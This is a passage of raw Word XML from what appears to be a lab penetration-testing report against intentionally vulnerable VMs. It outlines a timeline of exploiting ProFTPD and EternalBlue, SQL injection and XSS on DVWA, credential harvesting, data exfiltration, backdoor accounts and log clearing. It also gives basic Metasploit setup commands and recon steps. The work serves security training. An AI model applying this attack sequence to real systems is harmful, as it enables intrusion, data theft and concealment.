          <w:bCs/>
        </w:rPr>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, SMB)</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 xml:space="preserve">Day 3: Initial access - Exploited </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (192.168.18.52)</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 xml:space="preserve">Day 4: Initial access - Exploited </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on Windows 7 (192.168.18.60)</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Day 5: Web exploitation - SQL injection on DVWA</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 xml:space="preserve">Day 6: Web exploitation - XSS with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> framework</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Day 7: Post-exploitation - Credential harvesting</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Day 8: Lateral movement - SSH to OWASP server</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 xml:space="preserve">Day 9: Privilege escalation - Gained root on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Day 10: Privilege escalation - System privileges on Windows 7</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Day 11: Data collection - Located research files</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lastRenderedPageBreak/>
        <w:t>Day 12: Data exfiltration - Downloaded 85MB of data</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Day 13: Persistence - Created backdoor accounts</w:t>
      </w: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rPr>
        <w:t>Day 14: Covering tracks - Cleared logs</w:t>
      </w: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
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="065FFC4C" wp14:editId="2B5EB24C">
            <wp:extent cx="5943600" cy="334010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7"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A13DDC" w:rsidRPr="00C57BFC" w:rsidRDefault="00A13DDC" w:rsidP="00A13DDC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00753C79" w:rsidRPr="00C57BFC" w:rsidRDefault="00753C79" w:rsidP="00753C79">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.4 Attack Narrative and Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 1: Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Configured Kali Linux VMs in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Verified connectivity:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping -c 3 192.168.18.52</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping -c 3 192.168.18.55</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping -c 3 192.168.18.60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ping -c 3 192.168.18.61</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Initialized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> database and workspace:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>postgresql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>workspace -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>operation_ip_shield</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Created organized </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory for recon and target data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
        </w:rPr>
        <w:t>Phase 2: Reconnaissance (Days 1–2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Network Discovery:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ping sweeps and host enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Port Scanning:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Comprehensive TCP SYN scans using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>; OS detection and service enumeration performed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DNS Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> auxiliary module </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>enum_dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SMB Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Checked for MS17-010 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EternalBlue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, SMB shares, and users.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Banner grabbing, directory enumeration, and HTTP version scans on OWASP servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C57BFC" w:rsidRPr="00C57BFC" w:rsidRDefault="00C57BFC" w:rsidP="00C57BFC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
